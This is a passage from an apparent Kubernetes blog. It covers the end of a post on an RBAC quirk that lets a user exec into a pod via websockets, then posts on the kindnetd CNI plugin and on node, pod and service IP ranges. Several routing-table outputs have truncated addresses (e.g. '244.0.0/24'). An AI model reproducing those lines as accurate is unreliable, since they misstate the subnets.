kubectl --kubeconfig bob.config exec -it test -- /bin/bash
bash-5.1# exit
exit

It’s worth noting that, whilst it’s easier to do now, using websockets with these rights has been possible for a long time using tools like kubectl-execws from jpts.

Conclusion

Kubernetes RBAC has some tricky areas where the behaviour you get might not be exactly what you expect, and sometimes as in this case, those unexpected behaviours are not very apparent!

Exploring A Basic Kubernetes Network Plugin

Thu, 07 Nov 2024 12:00:00 +0000

In my last blog I took a look at some of the different IP addresses that get assigned in a standard Kubernetes cluster, but an obvious follow-on question is, how do pods get those IP addresses?, and to answer that question we need to talk about network plugins.

The Kubernetes project took the decision to delegate this part of container networking to external software, in order to make it a more flexible system that can be adapted to different use cases. The way this is done is that the project leverages the CNI specification and plugins which comply with that spec. can be used to provide container networking in Kubernetes clusters.

This means that, like many areas of Kubernetes, there’s quite a lot of possible complexity and options to consider, and over 20 different network plugins each with their own approach, so let’s start with the basics!

Exploring a basic cluster set-up

We’ll make use of kind to provide an initial demonstration cluster, which will give us their default network plugin kindnetd. Kindnetd provide a simple CNI implementation which works well for standard kind clusters. In order to demonstrate how networking works, we’ll setup a couple of worker nodes using this config file

kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker

Then, with that file saved as kindnet-multi-node.yaml we can start our test cluster with kind create cluster --name=kindnet-multi-node --config=kindnet-multi-node.yaml. Once the cluster’s up and running we can take a look at the networking.

One of the first questions we might have is “how are Kubernetes network plugins configured?”. The answer is that any CNI plugins in use have a configuration file in a nominated directory, which is /etc/cni/net.d by default. If we look at that directory on our kind nodes we’ll see a file called 10-kindnet.conflist which contains the configuration for the network plugin. Looking at the files in this directory is actually the most reliable way to determine which network plugin(s) are in use as there’s no direct record of it at a Kubernetes level.

{
        "cniVersion": "0.3.1",
        "name": "kindnet",
        "plugins": [
        {
                "type": "ptp",
                "ipMasq": false,
                "ipam": {
                        "type": "host-local",
                        "dataDir": "/run/cni-ipam-state",
                        "routes": [
                                { "dst": "0.0.0.0/0" }
                        ],
                        "ranges": [
                                [ { "subnet": "10.244.2.0/24" } ]
                        ]
                }
                ,
                "mtu": 1500
        },
        {
                "type": "portmap",
                "capabilities": {
                        "portMappings": true
                }
        }
        ]
}

From this configuration file we can see a bit of how the network plugin works. Firstly we see the ptp plugin is used. This plugin is actually one of the default ones that the CNI project maintains. What it does is create a veth network interface for each container, which can then be given an IP address. We can also see an ipam section which deals with how containers are allocated IP addresses. In this case we can see that a range of 10.244.2.0/24 is assigned to this node, and if we look at the other worker node in the cluster we see it has the 10.244.1.0/24 range,and the control plane node has 10.244.0.0/24.

So the next question might be “how does the traffic from a pod on one node get to a pod on another node?”. This will vary depending on the network plugin you’re using but in the case of kindnet it’s pretty simple. Essentially each node has the entries for the other nodes in its routing table. We can see that by running ip route on one of our nodes.

default via 172.18.0.1 dev eth0 
244.0.0/24 via 172.18.0.3 dev eth0 
244.2.0/24 via 172.18.0.2 dev eth0 
18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4

In this file we can see that the other nodes in the cluster have IP addresses of 172.18.0.3 and 172.18.0.2 respectively, and the container subnets are routed to those nodes.

We can also see how traffic gets to individual pods on that node. First let’s create a deployment with 4 replicas kubectl create deployment webserver --image=nginx --replicas=4. Once we’ve got that setup, we can run the ip route command again to see what effect that has had.

default via 172.18.0.1 dev eth0 
244.0.0/24 via 172.18.0.2 dev eth0 
244.1.2 dev vethc2e31815 scope host 
244.1.3 dev veth2621a4f6 scope host 
244.2.0/24 via 172.18.0.3 dev eth0 
18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4

We can see two new entries in our routing table for the two containers that got started on this worker node, showing how traffic would be sent to the container once it reaches the node.

Conclusion

This was a quick look at a very simple CNI implementation, and how it all works will vary depending on the network plugin(s) you use. If you’re looking for a more in-depth treatment of what we’ve discussed here, I’d recommend The Kubernetes Networking Guide which has a lot of information on this topic and others.

The Many IP Addresses of Kubernetes

Fri, 01 Nov 2024 08:00:00 +0000

When getting to grips with Kubernetes one of the more complex concepts to understand is … all the IP addresses! Even looking at a simple cluster setup, you’ll get addresses in multiple different ranges. So this is a quick post to walk through where they’re coming from and what they’re used for.

Typically you can see at least three distinct ranges of IP addresses in a Kubernetes cluster, although this can vary depending on the distribution and container networking solution in place. Firstly there is the node network where the container, virtual machines or physical servers running the Kubernetes components are, then there is an overlay network where pods are assigned IP addresses and lastly another network range where Kubernetes services are located.

We’ll start with a standard kind cluster before talking about some other sources of IP address complexity. We’ll start by running kind create cluster to get it up and running.

Once we’ve got the cluster started we can see what IP address the node has by running docker exec -it kind-control-plane ip addr show dev eth0 . The output of that command should look something like this

13: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fc00:f853:ccd:e793::2/64 scope global nodad 
       valid_lft forever preferred_lft forever
    inet6 fe80::42:acff:fe12:2/64 scope link 
       valid_lft forever preferred_lft forever

We can see that the address assigned is 172.18.0.2/16, which is a network controlled by Docker (as we’re running our cluster on top of Docker). If you have a Virtual machine or physical server the IP addresses will be in whatever range is assigned to the network(s) the host has.

So far, so simple. Now lets add a workload to our cluster and see what addresses are assigned there. Let’s start a webserver workload with kubectl run webserver --image=nginx. Once that pod starts we can run kubectl get pods webserver -o wide to see what IP address has been assigned to the pod.

NAME        READY   STATUS    RESTARTS   AGE   IP           NODE                 NOMINATED NODE   READINESS GATES
webserver   1/1     Running   0          42s   10.244.0.5   kind-control-plane   <none>           <none>

Our pod has an IP address of 10.244.0.5 which is in an entirely different subnet! This IP address is part of the overlay network that most (but not all) Kubernetes distributions use for their workloads. This subnet is generally automatically assigned by the Kubernetes network plugin used in the cluster, so it’ll change based on the plugin in use and any specific configuration for that plugin. What’s happening here is that our Kubernetes node has created an veth interface for our pod and assigned that address to it. We can see the pod IP addresses from the hosts perspective by running docker exec kind-control-plane ip route and we can see the IP addresses assigned to the different pods in the cluster, including the IP address we saw from our get pods command above.

default via 172.18.0.1 dev eth0 
244.0.2 dev veth9ee91973 scope host 
244.0.3 dev veth1b82cd96 scope host 
244.0.4 dev veth38302a10 scope host 
244.0.5 dev vethf915cecb scope host 
18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2 

Now we’ve got the node network and the pod network, let’s see what happens if we add a Kubernetes service to the mix. We can do this by running kubectl expose pod webserver --port 8080 which will create a service object for our webserver pod. There are several types of service object, but by default a ClusterIP service will be created, which provides an IP address which is visible inside the cluster, but not outside it. Once our service is created we can look at the IP address by running kubectl get services webserver

NAME        TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)    AGE
webserver   ClusterIP   10.96.198.83   <none>        8080/TCP   97s

We can see from the output that the IP address is 10.96.198.83 another IP address range! This range is set by a command line flag on the Kubernetes API server. In the case of our kind cluster, it looks like this --service-cluster-ip-range=10.96.0.0/16.

But from a host perspective, where does this IP address fit in. Well the reality of Kubernetes service objects is that, by default, they’re iptables rules created by the kube-proxy service on the node. We can see our webserver service by running this command docker exec kind-control-plane iptables -t nat -L KUBE-SERVICES -v -n --line-numbers

Chain KUBE-SERVICES (2 references)
num   pkts bytes target     prot opt in     out     source               destination         
      1    60 KUBE-SVC-NPX46M4PTMTKRN6Y  6    --  *      *       0.0.0.0/0            10.96.0.1            /* default/kubernetes:https cluster IP */ tcp dpt:443
      0     0 KUBE-SVC-UMJOY2TYQGVV2BKY  6    --  *      *       0.0.0.0/0            10.96.198.83         /* default/webserver cluster IP */ tcp dpt:8080
      0     0 KUBE-SVC-TCOU7JCQXEZGVUNU  17   --  *      *       0.0.0.0/0            10.96.0.10           /* kube-system/kube-dns:dns cluster IP */ udp dpt:53
      0     0 KUBE-SVC-ERIFXISQEP7F7OF4  6    --  *      *       0.0.0.0/0            10.96.0.10           /* kube-system/kube-dns:dns-tcp cluster IP */ tcp dpt:53
      0     0 KUBE-SVC-JD5MR3NA4I4DYORP  6    --  *      *       0.0.0.0/0            10.96.0.10           /* kube-system/kube-dns:metrics cluster IP */ tcp dpt:9153
   7757  465K KUBE-NODEPORTS  0    --  *      *       0.0.0.0/0            0.0.0.0/0            /* kubernetes service nodeports; NOTE: this must be the last rule in this chain */ ADDRTYPE match dst-type LOCAL

Conclusion

The goal of this post was just to explore a couple of concepts. Firstly, the variety of IP addresses you’re likely to see in a Kubernetes cluster and then how those tie to the operating system level.